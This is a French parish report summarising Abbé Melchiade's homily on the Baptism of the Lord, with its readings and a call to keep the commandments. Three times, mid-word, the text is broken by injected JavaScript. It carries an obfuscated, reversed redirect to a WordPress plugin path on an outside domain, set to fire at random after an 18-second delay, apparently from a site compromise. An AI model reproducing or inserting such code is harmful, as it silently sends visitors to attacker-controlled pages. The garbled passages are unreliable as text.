Avec la célébration du baptême du Seigneur, nous clôturons le temps de Noël pour commencer avec le temps dit ordinaire. La célébration eucharistique de ce dimanche a été présidée par l’Abbé Melchiade. Les lectures du jour ont été tirées du Livre d’Isaïe (62,1-5), de la première épitre de saint Paul aux Corinthiens (12,4-11) et l’Evangile selon saint Jean (2, 1-11).
Dans son homélie, l’Abbé Melchiade a dit que cette fête du baptême du Seigneur nous invite à faire un regard rétrospectif sur notre baptême et ce que nous en avons fait. Jean Baptiste a baptisé Jésus par l’eau, mais il avait prévenu que ce même Jésus baptiserait dans le feu et l’Esprit. Son baptême nous révèle que Jésus a voulu rendre notre vie nouvelle et changer notre condition pécheresse pour la rendre pieuse. Toute personne qui accepte de recevoir le baptême au nom du Christ renaît dans l’Esprit grâce à cette vie nouvelle que Jésus nous a apportée. Etant de nouvelles créatures, nous vivons en communion fraternelle comme nous l’a dit la première lecture. Grâce au baptême, les portes du Royaume de Dieu sont ouvertes pour nous, mais nous devons savoir que ce n’est pas seulement le fait de se faire baptiser qui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne le mérite d’entrer dans ce royaume. Il nous faut en plus faire toute la volonté du Père notamment en observant et en mettant en pratique ses commandements.
D’aucuns se demandent pourquoi beaucoup de gens qui se disent être baptisés continuent à maltraiter ou même tuer leur prochain. Si nous sommes baptisés alors que la Parole de Dieu ne demeure pas en nous, cela ne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit pas surprendre. Le baptême seul ne suffit pas pour atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopter un comportement digne et pacifique, il faut en plus avoir la Parole de Dieu en soi, l’observer et mettre en pratique les commandements. La volonté d’accomplir de bonnes œuvres, d’aider le prochain et de vivre en communion avec la nature vient de tout cela. L’Abbé Melchiade a conclu son homélie en demandant à tout un chacun de s’engager à bien garder le baptême avec tout ce qu’il recommande. Enfin, nous devons prier les uns pour les autres dans la vérité et la justice, espérant que l’intercession de la vierge Marie nous aidera à obtenir en héritage la vie éternelle.